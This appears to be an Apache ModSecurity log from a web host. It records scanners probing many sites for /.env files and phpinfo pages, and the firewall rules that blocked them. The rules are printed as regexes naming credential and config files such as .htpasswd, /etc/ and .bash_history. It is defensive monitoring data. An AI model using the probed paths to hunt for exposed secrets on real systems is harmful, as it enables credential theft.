[Tue May 26 14:02:00.431409 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaf5m_8al1sb-umPtpzQAATgs"]
[Tue May 26 14:02:00.443204 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVaf5m_8al1sb-umPtpywAATl8"]
[Tue May 26 14:02:00.507078 2026] [security2:error] [pid 578581:tid 578586] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.blog.jhonweb.com"] [uri "/php-info.php"] [unique_id "ahVagJm_8al1sb-umPtp7wAATgQ"]
[Tue May 26 14:02:00.523787 2026] [security2:error] [pid 578581:tid 578589] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.blog.jhonweb.com"] [uri "/php.php"] [unique_id "ahVagJm_8al1sb-umPtp8QAATgc"]
[Tue May 26 14:02:00.534618 2026] [security2:error] [pid 578581:tid 578584] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.blog.jhonweb.com"] [uri "/php_info.php"] [unique_id "ahVagJm_8al1sb-umPtp8gAATgI"]
[Tue May 26 14:02:00.549176 2026] [security2:error] [pid 578581:tid 578596] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.blog.jhonweb.com"] [uri "/phpinfo.php"] [unique_id "ahVagJm_8al1sb-umPtp9wAATg4"]
[Tue May 26 14:02:00.559700 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVagJm_8al1sb-umPtp5gAATgo"]
[Tue May 26 14:02:00.561822 2026] [security2:error] [pid 578581:tid 578803] [client 181.177.110.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVagJm_8al1sb-umPtp6wAAAFw"], referer: https://www.anujtradingco.com/
[Tue May 26 14:02:00.567360 2026] [security2:error] [pid 578581:tid 578694] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/portal/.env"] [unique_id "ahVagJm_8al1sb-umPtp-QAATnA"]
[Tue May 26 14:02:00.578077 2026] [security2:error] [pid 578581:tid 578680] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/prod/.env"] [unique_id "ahVagJm_8al1sb-umPtp-wAATmI"]
[Tue May 26 14:02:00.579245 2026] [security2:error] [pid 578581:tid 578696] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/product/.env"] [unique_id "ahVagJm_8al1sb-umPtp_gAATnI"]
[Tue May 26 14:02:00.580550 2026] [security2:error] [pid 578581:tid 578600] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/production/.env"] [unique_id "ahVagJm_8al1sb-umPtp_wAAThI"]
[Tue May 26 14:02:00.724951 2026] [security2:error] [pid 578581:tid 578603] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/project/.env"] [unique_id "ahVagJm_8al1sb-umPtqBQAAThU"]
[Tue May 26 14:02:00.726374 2026] [security2:error] [pid 578581:tid 578604] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.blog.jhonweb.com"] [uri "/public/phpinfo.php"] [unique_id "ahVagJm_8al1sb-umPtqCQAAThY"]
[Tue May 26 14:02:00.727435 2026] [security2:error] [pid 578581:tid 578598] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/public/.env"] [unique_id "ahVagJm_8al1sb-umPtqBwAAThA"]
[Tue May 26 14:02:00.727457 2026] [security2:error] [pid 578581:tid 578606] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/public-api/.env"] [unique_id "ahVagJm_8al1sb-umPtqCAAAThg"]
[Tue May 26 14:02:00.732868 2026] [security2:error] [pid 578581:tid 578610] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/public_html/.env"] [unique_id "ahVagJm_8al1sb-umPtqCwAAThw"]
[Tue May 26 14:02:00.880776 2026] [security2:error] [pid 578581:tid 578590] [remote 195.178.110.199:38276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.blog.jhonweb.com"] [uri "/qa/.env"] [unique_id "ahVagJm_8al1sb-umPtqEwAATgg"]
[Tue May 26 14:02:01.042148 2026] [security2:error] [pid 578581:tid 578743] [client 4.193.189.92:1355] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/inputs.php"] [unique_id "ahVagZm_8al1sb-umPtqGwAAACA"]
[Tue May 26 14:02:01.250971 2026] [security2:error] [pid 578581:tid 578777] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVagJm_8al1sb-umPtqDwAAAEI"]
[Tue May 26 14:02:01.291050 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVagJm_8al1sb-umPtp7QAATmU"]
[Tue May 26 14:02:01.438372 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVagJm_8al1sb-umPtp9AAATmA"]
[Tue May 26 14:02:01.444862 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVagZm_8al1sb-umPtqHAAATgk"]
[Tue May 26 14:02:01.751541 2026] [security2:error] [pid 578581:tid 578764] [client 4.193.189.92:6677] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/item.php"] [unique_id "ahVagZm_8al1sb-umPtqOwAAADU"]
[Tue May 26 14:02:02.093434 2026] [security2:error] [pid 578581:tid 578775] [client 181.177.110.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVagpm_8al1sb-umPtqRQAAAEA"], referer: https://www.anujtradingco.com/pages/services-wide/?unapproved=1429934&moderation-hash=d5f6669a8e063df5ec07d128d30da23b
[Tue May 26 14:02:02.302816 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVagJm_8al1sb-umPtp-gAATgE"]
[Tue May 26 14:02:02.319124 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVagJm_8al1sb-umPtqFQAAThQ"]
[Tue May 26 14:02:02.330406 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVagJm_8al1sb-umPtqDAAATnk"]
[Tue May 26 14:02:02.333811 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVagJm_8al1sb-umPtqBgAATnQ"]
[Tue May 26 14:02:02.347558 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVagJm_8al1sb-umPtqFgAATnU"]
[Tue May 26 14:02:02.347775 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVagJm_8al1sb-umPtqFwAATio"]
[Tue May 26 14:02:02.348325 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVagJm_8al1sb-umPtp-AAATgY"]
[Tue May 26 14:02:02.349379 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVagJm_8al1sb-umPtqAwAATg8"]
[Tue May 26 14:02:02.351797 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVagJm_8al1sb-umPtp_AAAThc"]
[Tue May 26 14:02:02.353015 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVagJm_8al1sb-umPtqFAAATmQ"]
[Tue May 26 14:02:02.360101 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVagJm_8al1sb-umPtqCgAATn0"]
[Tue May 26 14:02:02.362734 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVagJm_8al1sb-umPtp_QAATmI"]
[Tue May 26 14:02:02.393058 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVagJm_8al1sb-umPtqBAAATmM"]
[Tue May 26 14:02:02.428116 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVagZm_8al1sb-umPtqOgAATiA"]
[Tue May 26 14:02:02.447715 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVagZm_8al1sb-umPtqNAAAThE"]
[Tue May 26 14:02:02.451803 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVagZm_8al1sb-umPtqOQAAThs"]
[Tue May 26 14:02:02.479411 2026] [security2:error] [pid 578581:tid 578748] [client 4.193.189.92:3103] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/k.php"] [unique_id "ahVagpm_8al1sb-umPtqVAAAACU"]
[Tue May 26 14:02:02.570296 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVagpm_8al1sb-umPtqUgAAThM"]
[Tue May 26 14:02:02.616563 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVagpm_8al1sb-umPtqUwAATn8"]
[Tue May 26 14:02:02.617326 2026] [security2:error] [pid 578581:tid 578742] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVagpm_8al1sb-umPtqSwAAAB8"]
[Tue May 26 14:02:02.701667 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVagpm_8al1sb-umPtqWAAATkU"]
[Tue May 26 14:02:02.713766 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVagpm_8al1sb-umPtqVQAATic"]
[Tue May 26 14:02:03.243559 2026] [security2:error] [pid 578581:tid 578804] [client 4.193.189.92:2211] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/license.php"] [unique_id "ahVag5m_8al1sb-umPtqeAAAAF0"]
[Tue May 26 14:02:03.290101 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVagpm_8al1sb-umPtqVgAATkc"]
[Tue May 26 14:02:03.311886 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVagpm_8al1sb-umPtqXgAATjY"]
[Tue May 26 14:02:03.326089 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVagpm_8al1sb-umPtqYgAATjM"]
[Tue May 26 14:02:03.336194 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVagpm_8al1sb-umPtqYwAATjA"]
[Tue May 26 14:02:03.341711 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVagpm_8al1sb-umPtqZAAATkI"]
[Tue May 26 14:02:03.357901 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVagpm_8al1sb-umPtqZQAATiE"]
[Tue May 26 14:02:03.398930 2026] [security2:error] [pid 578581:tid 578789] [client 195.178.110.199:38276] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahVagpm_8al1sb-umPtqaQAATng"]
[Tue May 26 14:02:03.809860 2026] [security2:error] [pid 578581:tid 578704] [remote 110.249.201.145:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "kingsclub.in"] [uri "/billiards/"] [unique_id "ahVag5m_8al1sb-umPtqigAAQ3o"]
[Tue May 26 14:02:03.965118 2026] [security2:error] [pid 578581:tid 578758] [client 4.193.189.92:6365] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/load.php"] [unique_id "ahVag5m_8al1sb-umPtqkAAAAC8"]
[Tue May 26 14:02:04.694286 2026] [security2:error] [pid 578581:tid 578806] [client 4.193.189.92:6579] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/manager.php"] [unique_id "ahVahJm_8al1sb-umPtqrAAAAF8"]
[Tue May 26 14:02:04.772104 2026] [security2:error] [pid 578581:tid 578714] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVahJm_8al1sb-umPtqogAAAAM"]
[Tue May 26 14:02:05.452016 2026] [security2:error] [pid 578581:tid 578738] [client 4.193.189.92:6657] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/media.php"] [unique_id "ahVahZm_8al1sb-umPtqxgAAABs"]
